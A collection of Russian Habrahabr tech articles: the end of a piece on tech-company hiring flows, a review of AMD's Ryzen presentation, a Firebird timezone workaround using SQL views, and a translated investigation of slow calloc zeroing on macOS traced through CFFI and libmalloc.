Кое-что осталось неизменным. Если верить исследованию L2 ★ , то солидность бренда делает компанию более привлекательной. Если ваша фирма обладает репутацией новатора в области информационных технологий, то специалисты соответствующего профиля будут тянуться к вам сами. Изменения же коснулись работодателей, традиционно считавшихся респектабельными: у них начали возникать затруднения.
Возьмем в качестве примера Nike. Эта компания регулярно оказывается в списках лучших работодателей и по популярности обгоняет другие ведущие потребительские бренды — L'Oreal, P&G и LVMH. Но ее авторитет меркнет в сравнении с фирмами, исходно специализирующимися на цифровых технологиях. Число поисковых запросов о вакансиях в Amazon, Facebook или Google на порядок превосходит аналогичные показатели для Nike.
Оказывается, миграция айти-профессионалов из организаций в цифровые компании уже происходит. WPP, Omnicom, Publicis и Interpublic Group лишились своих специалистов, перешедших в Facebook и Google. Согласно анализу данных LinkedIn, проведенному L2, эти 2 гиганта наняли 2227 человек, ранее трудившихся в WPP, а вот WPP удалось привлечь лишь 124 бывших сотрудника Facebook и Google, то есть чистая потеря составила более 2100 человек.
Высоко котируются и работники, покидающие госучреждения. Их профессионализм обычно оказывается ценнее, чем опыт специалистов , мигрирующих в обратном направлении. Чаще всего подобным организациям удастся переманить из Facebook и Google только студентов или интернов, не получивших от гигантов предложений о постоянной работе.
Унылые разговоры ведутся и в отделах кадров крупнейших рекламных фирм: «Они забрали у нас лучших людей, а мы — их практикантов». Все в семью
Откуда компании, работающие в сфере высоких технологий, берут своих сотрудников? Заимствуют друг у друга. Но не все здесь находятся в равном положении. Традиционные игроки на этом поле передают своих специалистов новым титанам. Действительно, Microsoft является крупнейшим источником талантов для всех остальных фирм этого направления. В 10 исследованных L2 компаниях, исходно специализирующихся на цифровых технологиях, сегодня работают около 13 тыс. бывших сотрудников Microsoft.
Не удивительно, что Yahoo тоже теряет своих ведущих айти-профессионалов, переходящих к его конкурентам. Пока большинство цифровых компаний заимствует кадры из IBM, ее «младшие сестры» Pinterest и Snapchat переманивают специалистов из Google. IBM — это ваш отец, а Google — его младший брат. Оба они немножко хромают, но Дядя Джо ездит на Порше , и его увечность не так бросается в глаза.
Все это ставит сильные, но более старые команды в лиге цифровых технологий в несколько непривычное для них положение. Google, вкладывающий серьезные средства в кадровые ресурсы (в виде компенсаций, а также разных бонусов вроде питания в офисе и профобучения), наблюдает ярко выраженный «yo-yo»-феномен: возвращение некогда покинувших его специалистов. Так что хотя Google и теряет многих профессионалов, некоторые из них приходят обратно.
Действительно, у Google таких «раскаявшихся блудных сыновей» больше, чем у всех остальных компаний, специализирующихся на цифровых технологиях, вместе взятых. А это заставляет признать, что экономический эффект от подобных особенностей корпоративной культуры достаточно высок. Остальные члены Большой Четверки (Facebook, Apple и Amazon) тоже постоянно привлекают сотрудников других смежных компаний, в том числе и более молодых. Но в то же время таким игрокам, как Uber, Lyft и Airbnb совсем не сложно переманить работников Большой Четверки, предложив им до сих пор вожделенную для многих ведущих работников высокотехнологичной сферы акционерную долю.
У тех немногих компаний, которым удалось добиться определенных успехов в «заимствовании» специалистов у основных айти-гигантов, есть некоторые сходства. 1. Близость к центрам высоких технологий. Пример подает Walmart, который недавно приобрел Jet.com, что говорит о его концентрации на внутреннем преобразовании в универсальный канал продаж. Открытие офиса в Сан-Бруно (Калифорния) позволило ретейлеру привлечь более 300 работников Большой Четверки, причем 218 из них ранее работали в его крупнейшем конкуренте Amazon. 2. Выделение конкретных фирм. Nike нанял несколько бывших кадровиков из Apple и с их помощью сформировал персонал для ведущих магазинов из тех, кто мог предложить технологии продаж следующего поколения. Точно так же Kimberly-Clark нацелился на Amazon и увел оттуда ведущих специалистов в области электронной коммерции, которые, в свою очередь, помогли компании привлечь и других профессионалов. На самом деле 6% команды Kimberly-Clark, занимающейся данным направлением, пришли из Amazon. И целых 46% нанятых ими сотрудников Amazon обладали минимум 10-летним опытом работы. 3. Доступ к управлению. Есть и еще одна схема, позволяющая брендам с успехом заниматься рекрутингом, связанная с предоставлением чрезмерно раздутых прав и — что не удивительно — ключей от уборной топ-менеджеров. L'Oreal, к примеру, удалось нанять директора по цифровым технологиям из Instagram, предоставив ему место в правлении.
В целом, тенденции ошеломляющие. Новейшие компании, исходно специализирующиеся на цифровых технологиях, забирают у своих старших товарищей лучших из лучших. Квотербеки и вчерашние королевы выпускного бала остаются на вечеринках в одиночестве , в то время как остальные стремятся оказаться на селфи с капитаном команды по шахматам, едва открывшим SaaS-фирму.
И хотя у старой гвардии и есть тактика, позволяющая ей привлекать работников, ее до недавнего времени впечатляющие возможности несколько потускнели. Сегодня ей все труднее становится закатывать этот камень в гору. P.S. Рекомендуем ещё одну полезную статью — Почему Дима Королев ушел из Microsoft, Facebook и Google прежде чем присоединиться к стартапу?
Автор перевода — Давиденко Вячеслав, основатель компании TESTutor . | https://habrahabr.ru/company/testutor/blog/317618/ |
habrahabr | Новая эра процессоров от AMD: Обзор презентации процессора Ryzen (Zen). Умный процессор? | ['amd', 'zen', 'ryzen', 'summit ridge', 'процессоры', 'amd vega', 'презентация'] |
13 декабря 2016 (14 декабря 2016 по МСК) состоялось весьма и весьма ожидаемое мероприятие — презентация всему миру нового поколения процессоров от AMD. Тех самых процессоров, которые составят... |
13 декабря 2016 (14 декабря 2016 по МСК) состоялось весьма и весьма ожидаемое мероприятие — презентация всему миру нового поколения процессоров от AMD. Тех самых процессоров, которые составят отличную конкуренцию Intel.
Чего можно было ожидать и что мы увидели в итоге? Что-то порадовало, а что-то не очень.
Как водится на таких мероприятиях, изначально AMD решили напомнить о своих прошлых успехах. Не забыли о консолях, которые построены на AMD и большой любви испытываемой AMD к геймерскому комьюнити. Zen — кодовое название проекта, над которым была начата работа еще 4 года назад. По заявлениям (CEO AMD) Lisa Su, это новая архитектура с чистого листа. И было выделено 2 основные цели, которые поставили перед собой инженеры из AMD: Увеличить IPC (количество выполняемых инструкций на такт) на 40% уложившись в прежние рамки энергопотребления по сравнению с архитектурой Excavator.
Построить умную систему. Железо наделенное необходимыми фичами, которые позволяют накапливать знания и учится работать лучше и лучше.
Почему Zen ? Zen являет собой баланс. Оптимальный баланс между мощностью, потреблением и возможностями. Lisa Su считает, что мощность Zen откроет вычислительным системам новые горизонты. И первопроходцем в этих начинаниях будет новый процессор семейства Ryzen . Исполнительный директор AMD не скрывает своих амбиций и пророчит новой архитектуре повсеместный успех. Важно отметить, что разработкой новой архитектуры занимался Джим Келлер (Jim Keller), за которым успешные Athlon XP и Athlon64. Zen включает в себя не только десктопные процессоры. Но именно с десктопными процессорами AMD пожелали явить миру Zen .
Всего в первом квартале 2017 года ожидается выход 4 версий процессора:
Что же может предложить нам новое поколение. Новая эра, как не постеснялись в AMD. (на этом кадре за спиной у Лизы наблюдательный зритель может заметить маленький «косячок»)
Первой пташкой будет процессор топового сегмента под кодовым названием SR7 (Summit Ridge): 8 ядер
16 потоков
Базовая частота ядра 3.4Ггц
4Мб L2 + 16Mb L3 кэша
Энергопотребление до 95 Вт
Новый сокет AM4
Запланированный 40% прирост IPC был достигнут и даже побит, правда не известно на сколько.
Выглядит не плохо и это не все. Инженеры AMD кропотливо трудились над новой технологией, получившей название AMD SenseMI . Технология на данном этапе включает в себя 5 фич: Neural net Prediction
Smart Prefetch
Pure Power
Precision Boost
Extended Frequensy Range
Все эти фичи реализуют «умные» возможности процессора. Сотни различных сенсоров передают свои сигналы нейронной сети, нейронная сеть запоминает и учится управлять процессором на свое усмотрение. Таким образом в типовых задачах процессор сможет повышать частоты до того как в этом будет реальная необходимость. Перемещать требуемые данные из общего кэша, в кэш второго уровня еще до того момента как они могут потребоваться. Снижать энергопоребление, когда есть необходимость, а в случаях крайней важности и возможности, разгонять процессор автоматически до частот превышающих турбо. Насколько высок будет возможен такой автоматический разгон, зависит от системы питания и охлаждения. Директор AMD не применула пошутить про энтузиастов с охлаждением жидким азотом.
Хотелось бы узнать гораздо больше о работе технологии AMD SenseMI. Но после этого все внимание уделялось тестам.
Сравнили скорость рендеринга в блендере.
Результат на одинаковом уровне.
Скорость кодирования видео.
Небольшой отрыв за процессором от AMD.
Потом AMD похвасталась хорошей отзывчивостью системы при работе в zbrush c высокополигональными моделями…
Была продемонстрирована работа с моделями в несколько миллионов полигонов. И правда, выглядит бодренько.
(~7 млн полигонов)
(~32 млн полигонов)
Было очень много высказываний о 4К гейминге и готовности новой платформы к этим новшествам. Сравнения «на глазок» быстродействия Ryzen и i7 6900K в играх и стриминге не сопровождалось какими либо техническими данными о загрузке ЦП, количество кадров в секунду и тд. Все это выглядит весьма сомнительно, но придется оставить на совести AMD до первых живых тестов в руках энтузиастов.
Стенды с одинаковым объемом ОЗУ и видеокартами NVIDIA Titan X (Pascal). Тут AMD предложили нам оценить разницу 4К геймплея в Battlefield 1. И это еще на трансляции в 1080р/30FPS. Да и вообще весь этот тест бесполезен, т.к. подготовить 60 кадров в секунду могут и более слабые, «народные» процессоры имеющиеся на рынке.
Демонстрация использования процессора в, так называемой, смешанной реальности (mixed reality). Процессор задействован в подготовке 3д сцены для очков виртуальной реальности + отдельный вьюпорт для отображения игрока в этой 3д сцене. Тема пока довольно молода, но уже используется энтузиастами на текущем железе, доступном на рынке уже сейчас.
Сравнительный тест 3 процессоров (i7 6700K, i7 6900K, AMD SR7) в ходе которого мы увидели, что новый процессор справляется с игрой (Dota 2) и кодированием видеопотока для стриминга в 1080р на TWICH. Но вот, что странно, i7 6700K оказался некомпетентным в этом вопросе даже при разгоне до 4.5Ггц. Стриминг вышел абсолютно «несмотрибельным». Этот миф я попытался развеять на своем i5 6500. Тестовый стриминг Dota 2 на i5 6500
В целом вся презентация сопровождалась скудным объемом технических данных и больше походит на своеобразный тизер, порождающий в голове еще больше вопросов. «One more thing...»
На последок CEO AMD заготовила демонстрацию возможностей нового процессора + новой графической системы под кодовым названием Vega. Был продемонстрировал 4К геймплей, но опять же не подправленый специями из технических данных самой системы и того как она справляется с нагрузкой.
Цены на новую логику озвучены не были. Единственная озвученая цена — USD 2070. Столько стоит та самая, продемонстрированная в конце презентации, игровая система. Но какова комплектация за эти деньги — не известно.
Сама презентация выглядела довольно живенькой, но остается некоторе неприятное послевкусие от недосказанности и нехватки технических деталей.
О цене продемонстрированного процессора остается только догадываться. По разным утечкам она сходится на приблизительной планке в USD 500-600. Но если учесть ценовую стратегию AMD на рынке видеокарт, не стоит ожидать демпинга процессорного рынка со стороны AMD. Все-таки SR7 сравнивался с i7 6900K цена которого (USD 1100) в 2 раза выше ожидаемой цены SR7. И по тестам их производительность находится на, примерно, одинаковом уровне.
Но цена будет однозначно меньше аналогов от Intel. И сам факт выхода на рынок достойного конкурента для Intel оставляет хорошие надежды на небольшую встряску рынка, и изменение цен в сторону их уменьшения.
Остается ждать новых деталей проекта, а энтузиастам начинать откладывать деньги на приобретение нового железа. Простым консьюмерам скорее не зачем становиться в очередь за покупкой новой системы на AMD, т.к. мощности такого процессора будут избыточны для типовых задач. А «народные» процессоры Ryzen появятся весной и большинство пользователей ожидают именно их. Краткий и, возможно, не очень содержательный видеообзор Презентация с качественным переводом. Для тех, кто еще не смотрел | https://geektimes.ru/post/283698/ |
habrahabr | Как сделать разный часовой пояс в разных базах данных на одном сервере | ['Часовой пояс', 'firebird'] | Уважаемые Хабравчане, решил поделиться с Вами техническим решением некоторых интересных и на первый взгляд не очевидных проблем. Всю жизнь я в основном только черпал информацию, читал замечательные... | Уважаемые Хабравчане, решил поделиться с Вами техническим решением некоторых интересных и на первый взгляд не очевидных проблем. Всю жизнь я в основном только черпал информацию, читал замечательные статьи (в том числе на Хабре) очень помогавшие мне в решении тех или иных технических проблем. Но в последние 2 года, занявшись разработкой своей облачной платформы для автоматизации предприятий, мне пришлось решать довольно много задач “впервые”, т.е. которые если кто-то и решал, то описания (даже близко) я не находил. В связи с этим я решил написать 3 цикла статей: цикл по базам данных, цикл по безопасности и цикл по системам автоматизации. Эта статья — первая статья первого цикла. Краткая формулировка задачи : каким-то образом current_date, current_time и current_timestamp должны выдавать дату-время в зависимости от настроек в аккаунте пользователя и при этом на самом сервере будет стоять московское время.
Система задумывалась неограниченно масштабируемая, с огромным числом потенциальных пользователей в любом регионе нашей необъятной страны, в какой-то момент встал вопрос, а удобно ли будет пользователям, например во Владивостоке, работать в системе с московским временем. Сервера то находятся в Москве, на них стоит московское время, при этом каждому пользователю (не важно, из какого он региона) выделяется несколько своих (индивидуальных) баз данных и все они находятся, грубо говоря, на одном сервере. Делать под каждый часовой пояс свой сервер глупо, да и не возможно с точки зрения концепции системы, ибо любой пользователь в любой момент может часовой пояс поменять.
Тип базы данных используемых в текущий момент – firebird 3
После суток метаний и изучений мануалов, найдено было следующее простое решение. Было создано 3 простых VIEW: CREATE OR ALTER VIEW D_CURRENT_DATE(DD)
AS
SELECT cast((current_timestamp+0.000000000000000)as date) as dd FROM RDB$DATABASE;
CREATE OR ALTER VIEW D_CURRENT_TIME(DD)
AS
SELECT cast((current_timestamp+0.000000000000000)as time) as dd FROM RDB$DATABASE;
CREATE OR ALTER VIEW D_CURRENT_TIMESTAMP(DD)
AS
SELECT (current_timestamp+0.000000000000000) as dd FROM RDB$DATABASE;
Приведенные выше VIEW — для московского времени, которое стоит по умолчанию. Если пользователь выбирает часовой пояс отличный от московского, например “UTC+7 Красноярское время”, php-шный скрипт (при помощи которого пользователь это выбирает) изменяет VIEW в его БД следующим образом. CREATE OR ALTER VIEW D_CURRENT_DATE(DD)
AS
SELECT cast((current_timestamp+0.166666666666667)as date) as dd FROM RDB$DATABASE;
CREATE OR ALTER VIEW D_CURRENT_TIME(DD)
AS
SELECT cast((current_timestamp+0.166666666666667)as time) as dd FROM RDB$DATABASE;
CREATE OR ALTER VIEW D_CURRENT_TIMESTAMP(DD)
AS
SELECT (current_timestamp+0.166666666666667) as dd FROM RDB$DATABASE;
Соответственно, из базового current_timestamp, будет прибавляться (либо вычитаться) количество часов, в зависимости от того часового пояса, который выбирает пользователь.
Далее везде, в коде всех скриптов, процедур, триггеров вместо current_timestamp пишется всегда d_current_timestamp. Благодаря этому, во всех записях в БД всегда будет проставляться время пользователя, а не московское, несмотря на то, что все базы данных на одном сервере с московским временем. | https://habrahabr.ru/post/317680/ |
habrahabr | Отладка вашей ОС: урок по выделению памяти | ['c', 'выделение памяти', 'отладка', 'никто не читает теги'] |
Всё началось, как и многие другие расследования, с баг-репорта.
Название отчёта было довольно простым: «При HTTP-подключении iter_content медленно работает с чанками большого размера».... |
Всё началось, как и многие другие расследования, с баг-репорта .
Название отчёта было довольно простым: «При HTTP-подключении iter_content медленно работает с чанками большого размера». Подобное название немедленно включило у меня в голове сирену по двум причинам. Во-первых, довольно сложно определить, что здесь означает «медленно»? Насколько медленно? Насколько велик «большой размер»? Во-вторых, если бы описанное проявлялось действительно серьёзно, то мы бы об этом уже знали. Метод iter_content используется давно, и если бы он существенно притормаживал в распространённом пользовательском режиме, то мимо нас такая информация не прошла бы.
Я быстро просмотрел отчёт. Автор предоставил мало подробностей, но написал вот что: «Это приводит к 100%-й загрузке процессора и снижает пропускную способность сети ниже 1 Мб/с». Я ухватился за эту фразу, потому что такого быть не может. Простое скачивание с минимальной обработкой не бывает настолько медленным!
Однако все сообщения о багах до опровержения заслуживают расследования. Пообщавшись с автором отчёта, удалось восстановить сценарий проявления бага: если использовать Requests с PyOpenSSL и запустить следующий код, то процессор будет полностью загружен, а пропускная способность сети упадёт до минимума: import requests
https = requests.get("https://az792536.vo.msecnd.net/vms/VMBuild_20161102/VirtualBox/MSEdge/MSEdge.Win10_preview.VirtualBox.zip", stream=True)
for content in https.iter_content(100 * 2 ** 20): # 100MB
pass
Это просто замечательный воспроизводимый сценарий, потому что он совершенно чётко указывает на стек Requests. Здесь не выполняется пользовательский (user-supplied) код: это часть библиотеки Requests или одной из его зависимостей; нет вероятности, что это пользователь написал дурацкий низкопроизводительный код. Настоящая фантастика. Ещё более фантастично использование публичного URL. Я мог выполнить сценарий ! И, сделав это, я столкнулся с багом. При каждом выполнении.
Здесь была ещё одна прелестная подробность: При 10 Мб не отмечается какого-то роста нагрузки на процессор и влияния на пропускную способность. При 1 Гб процессор загружается на 100 %, как и при 100 Мб, но пропускная способность падает ниже 100 Кб/с, в отличие от 1 Мб/с при 100 Мб.
Это очень интересный момент: он намекает на то, что литеральное значение (literal value) размера чанка влияет на рабочую нагрузку. Если учесть, что это происходит только при использовании PyOpenSSL, а также что большую часть времени стек обслуживает вышеприведённый код, проблема становится ясна: File "/home/user/.local/lib/python2.7/site-packages/OpenSSL/SSL.py", line 1299, in recv
buf = _ffi.new("char[]", bufsiz)
Расследование показало, что стандартное поведение CFFI относительно FFI.new заключается в возвращении обнулённой памяти. Это означало линейное увеличение избыточности в зависимости от размера выделяемой памяти: более крупные объёмы приходилось обнулять дольше. Следовательно, плохое поведение связано с выделением больших объёмов. Мы воспользовались возможностью CFFI отключить обнуление этих буферов, и проблема ушла 1 . Так она решена, верно?
Неверно. Настоящий баг
Шутки в сторону: это действительно позволило решить проблему. Но несколько дней спустя мне задали очень глубокомысленный вопрос: зачем вообще память активно обнулялась ? Чтобы понять суть вопроса, давайте отвлечёмся и поговорим о выделении памяти в POSIX-системах. malloc и calloc и vmalloc, ох ты ж!
Многим программистам известен стандартный способ запроса памяти у оперативной системы. В этом механизме задействована функция malloc из стандартной библиотеки С (можете почитать документацию о ней для вашей ОС, введя в мануале в поиск man 3 malloc ). Эта функция берёт один аргумент — количество байтов памяти, которое нужно выделить. Стандартная библиотека С выделяет память по одной из нескольких разных методик, но так или иначе она возвращает указатель на участок памяти, по крайней мере такой же большой , как и запрошенный вами объём.
По умолчанию malloc возвращает неинициализированную память . То есть стандартная библиотека С выделяет какой-то объём и немедленно передаёт его вашей программе, без изменения данных, которые уже там находятся . То есть при использовании malloc вашей программе будет возвращаться буфер, в который она уже записывала данные. Это распространённая причина багов в не безопасных по памяти (memory-unsafe) языках, например С. В целом читать из неинициализированной памяти очень рискованно.
Однако у malloc есть друг, задокументированный на той же странице мануала: calloc . Его главное отличие заключается в том, что он принимает два аргумента — счётчик и размер. Используя malloc , вы просите стандартную библиотеку С: «Пожалуйста, выдели мне не менее n байтов». А при вызове calloc вы просите её: «Пожалуйста, выдели достаточно памяти для n объектов размером m байтов». Очевидно, что первичная идея вызова calloc заключалась в безопасном выделении кучи для массивов объектов 2 .
Но у calloc есть побочный эффект, связанный с его исходным предназначением для размещения массивов в памяти. О нём очень скромно упоминается в мануале. Выделенная память заполнена нулевыми байтами.
Это идёт рука об руку с предназначением calloc . К примеру, если вы размещаете в памяти массив значений, то зачастую будет очень полезно, чтобы он изначально имел состояние по умолчанию. В некоторых современных безопасных по памяти языках это уже стало стандартным поведением при создании массивов и структур. Скажем, когда в Go инициализируешь структуру, то все её члены по умолчанию приведены к своим так называемым «нулевым» значениям, эквивалентным «таким значениям, которые были бы, если бы всё сбросили в ноль». Это можно считать обещанием, что все Go-структуры размещаются в памяти с помощью calloc 3 .
Такое поведение означает, что malloc возвращает неинициализированную память, а calloc — инициализированную . А раз так, да ещё и в свете вышеупомянутых строгих обещаний, то операционная система может оптимизировать выделяемую память. И действительно, многие современные ОС так делают. Воспользуемся calloc
Конечно, простейший способ внедрить calloc — это написать что-то вроде: void *calloc(size_t count, size_t size) {
assert(!multiplication_would_overflow(count, size));
size_t allocation_size = count * size;
void *allocation = malloc(allocation_size);
memset(allocation, 0, allocation_size);
return allocation;
}
Стоимость подобной функции изменяется примерно линейно по отношению к размеру выделяемой памяти: чем больше байтов, тем дороже их все обнулить. Сегодня большинство ОС по факту содержат стандартные библиотеки С, в которых прописаны оптимизированные пути для memset (обычно используются специализированные процессорные векторные инструкции, позволяющие одной инструкцией обнулять сразу большое количество байтов). Тем не менее стоимость этой процедуры меняется линейно.
Для выделения больших объёмов в ОС используется ещё один трюк, имеющий отношение к виртуальной памяти. Виртуальная память
Здесь мы не будем разбирать всю структуру и работу виртуальной памяти, но я очень рекомендую об этом почитать (тема крайне интересная!). Вкратце: виртуальная память — это ложь ядра ОС процессам о доступной памяти. У каждого выполняемого процесса есть своё представление о памяти, принадлежащей ему и только ему. Это представление косвенно «отображается» (mapped) на физическую память.
В результате ОС может прокручивать всевозможные хитрые трюки. Чаще всего она выдаёт за память специальные файлы, отображаемые в неё (memory-mapped file). Они используются для выгрузки содержимого памяти на диск, а также для отображения в них памяти. В последнем случае программа просит ОС: «Пожалуйста, выдели мне n байтов памяти и сохрани их в файле на диске, так, чтобы, когда я буду писать в память, все записи выполнялись бы в этот файл, а когда считываю из памяти, то данные считывались бы из него же».
На уровне ядра это работает так: когда процесс пытается считать из такой памяти, процессор уведомляет, что память не существует, ставит процесс на паузу и бросает «ошибку страницы» (page fault). Ядро помещает в память актуальные данные, чтобы приложение могло их считать. Затем процесс снимается с паузы и находит в соответствующем месте волшебным образом появившиеся данные. С точки зрения процесса всё произошло мгновенно, без паузы.
Этот механизм можно использовать для выполнения других тонких трюков. Один из них заключается в «бесплатности» выделения очень больших объёмов памяти. Или, точнее, в том, чтобы сделать их стоимость пропорциональной степени использования этой памяти, а не выделяемому размеру.
Исторически сложилось так, что многие программы, которым во время выполнения нужны порядочные куски памяти, при запуске создают большой буфер, который потом может распределяться внутри программы в ходе её жизненного цикла. Так делалось потому, что программы писались для окружений, не использовавших виртуальную память; программам приходилось сразу занимать какие-то объёмы памяти, чтобы потом не испытывать в ней недостатка. Но после внедрения виртуальной памяти такое поведение стало ненужным: каждая программа может выделить себе столько памяти, сколько надо, не вырывая у других кусок изо рта 4 .
Чтобы избежать очень больших затрат при запуске приложений, операционные системы начали врать приложениям. В большинстве ОС, если вы попытаетесь выделить более 128 Кб в рамках одного вызова, стандартная библиотека С напрямую попросит у ОС совершенно новые страницы виртуальной памяти, которые покроют запрошенные объёмы. Но главное: такое выделение почти ничего не стоит . Ведь на самом деле ОС ничего не делает: она лишь перенастраивает схему виртуальной памяти. Так что при использовании malloc расходы получаются мизерными.
Память не была «приписана» к процессу, и, как только приложение пытается использовать её на самом деле, возникает ошибка страницы памяти. Здесь вмешивается ОС, находит нужную страницу и помещает её туда, куда обращается процесс, так же, как и в случае с ошибкой памяти и файлом отображаемой памяти. Только разница в том, что виртуальная память обеспечивается памятью физической, а не файлом.
В результате, если вызвать malloc(1024 * 1024 * 1024) для выделения 1 Гб памяти, это произойдёт почти мгновенно, потому что на самом деле процессу память не выделяется. Зато программы могут моментально «выделять» для себя многие гигабайты, хотя в реальности это происходило бы далеко не быстро.
Но ещё удивительнее то, что такая же оптимизация доступна и для calloc . ОС может отображать совершенно новую страницу на так называемую «нулевую страницу»: это страница памяти, доступная только для чтения, причём считываются из неё одни лишь нули. Изначально такое отображение представляет собой копирование при записи (copy-on-write): когда ваш процесс пытается записать данные в эту новую память — вмешивается ядро, копирует все нули в новую страницу, а затем разрешает вам выполнить запись.
Благодаря такому ухищрению со стороны ОС calloc может при выделении больших объёмов делать то же самое, что и malloc , запрашивая новые страницы виртуальной памяти. Это будет происходить бесплатно до тех пор, пока память не начнёт использоваться. Подобная оптимизация означает, что стоимость calloc(1024 * 1024 * 1024, 1) будет равна вызову malloc для такого же объёма памяти, несмотря на то что calloc ещё и обещает заполнять память нулями. Умно! Вернёмся к нашему багу
Итак: если CFFI использовал calloc , то почему память обнулялась?
Для начала: calloc использовался не всегда. Но я подозревал, что в данном случае могу воспроизвести замедление напрямую с помощью calloc , поэтому снова накидал программу: #include <stdlib.h>
#define ALLOCATION_SIZE (100 * 1024 * 1024)
int main (int argc, char *argv[]) {
for (int i = 0; i < 10000; i++) {
void *temp = calloc(ALLOCATION_SIZE, 1);
free(temp);
}
return 0;
}
Очень простая программа на C, выделяющая и освобождающая 100 Мб посредством вызова calloc десять тысяч раз. Затем выполняется выход. Далее — два варианта 5 : calloc может использовать вышеописанную хитрость с виртуальной памятью. В таком случае программа должна работать быстро: выделяемая память на самом деле не используется, не разбивается на страницы, а страницы не становятся «грязными» (dirty). ОС врёт нам насчёт выделения, а мы не ловим её за руку, так что всё работает прекрасно.
calloc может привлечь malloc и вручную обнулить память с помощью memset . Это должно делаться очень-очень медленно: в сумме нам надо обнулить терабайт памяти (десять тысяч циклов по 100 Мб), что очень непросто.
Это сильно превышает стандартный порог ОС для использования первого варианта, так что можно ожидать именно такого поведения. Действительно, Linux так и поступает: если скомпилировать код с помощью GCC и запустить, то он выполнится крайне быстро, сгенерирует несколько ошибок страницы и почти не приведёт к нагрузке на память. Но если ту же программу запустить на MacOS, то она будет выполняться крайне долго: у меня это заняло почти восемь минут .
Более того, если увеличить ALLOCATION_SIZE (например, 1000 * 1024 * 1024 ), то на MacOS эта программа станет работать почти мгновенно! Что за чертовщина?
Что тут вообще происходит? Углублённый разбор
В MacOS есть утилита sample (см. man 1 sample ), которая может многое рассказать о выполняемом процессе, регистрируя его состояние. Для нашего кода sample выдаёт такое: Sampling process 57844 for 10 seconds with 1 millisecond of run time between samples
Sampling completed, processing symbols...
Sample analysis of process 57844 written to file /tmp/a.out_2016-12-05_153352_8Lp9.sample.txt
Analysis of sampling a.out (pid 57844) every 1 millisecond
Process: a.out [57844]
Path: /Users/cory/tmp/a.out
Load Address: 0x10a279000
Identifier: a.out
Version: 0
Code Type: X86-64
Parent Process: zsh [1021]
Date/Time: 2016-12-05 15:33:52.123 +0000
Launch Time: 2016-12-05 15:33:42.352 +0000
OS Version: Mac OS X 10.12.2 (16C53a)
Report Version: 7
Analysis Tool: /usr/bin/sample
----
Call graph:
3668 Thread_7796221 DispatchQueue_1: com.apple.main-thread (serial)
3668 start (in libdyld.dylib) + 1 [0x7fffca829255]
3444 main (in a.out) + 61 [0x10a279f5d]
+ 3444 calloc (in libsystem_malloc.dylib) + 30 [0x7fffca9addd7]
+ 3444 malloc_zone_calloc (in libsystem_malloc.dylib) + 87 [0x7fffca9ad496]
+ 3444 szone_malloc_should_clear (in libsystem_malloc.dylib) + 365 [0x7fffca9ab4a7]
+ 3227 large_malloc (in libsystem_malloc.dylib) + 989 [0x7fffca9afe47]
+ ! 3227 _platform_bzero$VARIANT$Haswel (in libsystem_platform.dylib) + 41 [0x7fffcaa3abc9]
+ 217 large_malloc (in libsystem_malloc.dylib) + 961 [0x7fffca9afe2b]
+ 217 madvise (in libsystem_kernel.dylib) + 10 [0x7fffca958f32]
221 main (in a.out) + 74 [0x10a279f6a]
+ 217 free_large (in libsystem_malloc.dylib) + 538 [0x7fffca9b0481]
+ ! 217 madvise (in libsystem_kernel.dylib) + 10 [0x7fffca958f32]
+ 4 free_large (in libsystem_malloc.dylib) + 119 [0x7fffca9b02de]
+ 4 madvise (in libsystem_kernel.dylib) + 10 [0x7fffca958f32]
3 main (in a.out) + 61 [0x10a279f5d]
Total number in stack (recursive counted multiple, when >=5):
Sort by top of stack, same collapsed (when >= 5):
_platform_bzero$VARIANT$Haswell (in libsystem_platform.dylib) 3227
madvise (in libsystem_kernel.dylib) 438
Здесь мы ясно видим, что куча времени тратится на метод _platform_bzero$VARIANT$Haswell . Он используется для обнуления буферов. То есть MacOS их обнуляет. Почему?
Спустя какое-то время после релиза Apple делает открытым большую часть основного кода своей ОС. И можно увидеть, что эта программа тратит немало времени в libsystem_malloc . Я отправился на opensource.apple.com , скачал архив libmalloc-116 с нужным мне исходным кодом и принялся исследовать.
Похоже, вся магия происходит в large_malloc . Эта ветка нужна для выделения памяти крупнее 127 Кб, она использует трюк с виртуальной памятью. Так почему у нас всё медленно работает?
Похоже, дело в том, что Apple слишком перемудрила. В large_malloc за константой #define спрятана куча кода, CONFIG_LARGE_CACHE . В основном весь этот код сводится к «списку свободных» (free-list) страниц больших объёмов памяти, выделенных для программы. Если MacOS выделяет смежный буфер размером от 127 Кб до LARGE_CACHE_SIZE_ENTRY_LIMIT (примерно 125 Мб), тогда libsystem_malloc попытается снова пустить в ход эти страницы, если ими может воспользоваться другой процесс выделения памяти. Благодаря этому ему не приходится просить страницы у ядра Darwin, что экономит переключение контекста и системный вызов: в принципе, нетривиальная экономия.
Однако это тот случай для calloc , когда нужно обнулить байты. И если MacOS находит страницу, которую можно использовать повторно и которая была вызвана из calloc , то память обнулится . Вся. И так каждый раз.
В этом есть свой резон: обнулённые страницы — ограниченный ресурс, особенно в условиях скромного железа (смотрю на Apple Watch). Так что если страницу можно использовать повторно, то это может дать хорошую экономию. Однако кеш страницы полностью лишает нас преимуществ использования calloc для предоставления обнулённых страниц памяти. Это было бы не так уж плохо, если бы делалось только для «грязных» страниц. Если приложение записывает в обнуляемую страницу, то та, вероятно, не будет обнулена. Но MacOS выполняет это безоговорочно . Это значит, что даже если вызвать alloc , free и calloc , вообще не трогая память, то при втором вызове calloc будут взяты страницы, выделенные во время первого вызова и ни разу не поддержанные физической памятью. Поэтому ОС приходится загрузить (page-in) всю эту память, чтобы обнулить её, хотя она уже была обнулена . Этого мы и хотим избежать с помощью средства распределения на базе виртуальной памяти, когда доходит до выделения больших объёмов: ни разу не использовавшаяся память становится использованной «списком свободных» страниц.
В результате на MacOS стоимость calloc линейно возрастает в зависимости от размера выделяемой памяти вплоть до 125 Мб, несмотря на то что другие ОС демонстрируют поведение O(1) начиная со 127 Кб. После 125 Мб MacOS перестаёт кешировать страницы, так что скорость волшебным образом взлетает.
Я не ожидал найти такой баг из программы на Python, и у меня возник ряд вопросов. Например, сколько процессорных циклов теряется на обнуление памяти, которая уже обнулена? Сколько переключений контекста уходит на то, чтобы заставлять приложения загружать (page-in) память, которую они не использовали (и не собираются), чтобы ОС могла бессмысленно её обнулить?
Мне кажется, всё это подтверждает верность старой поговорки: утечки есть во всех абстракциях ( all abstractions are leaky ). Вы не можете забывать об этом лишь потому, что программируете на Python. Ваша программа выполняется на машине, использующей память и всякие трюки для её управления. Однажды, совершенно неожиданно, написанный вами код станет работать очень медленно. И разобраться с этим удастся, лишь разобравшись во внутренностях ОС.
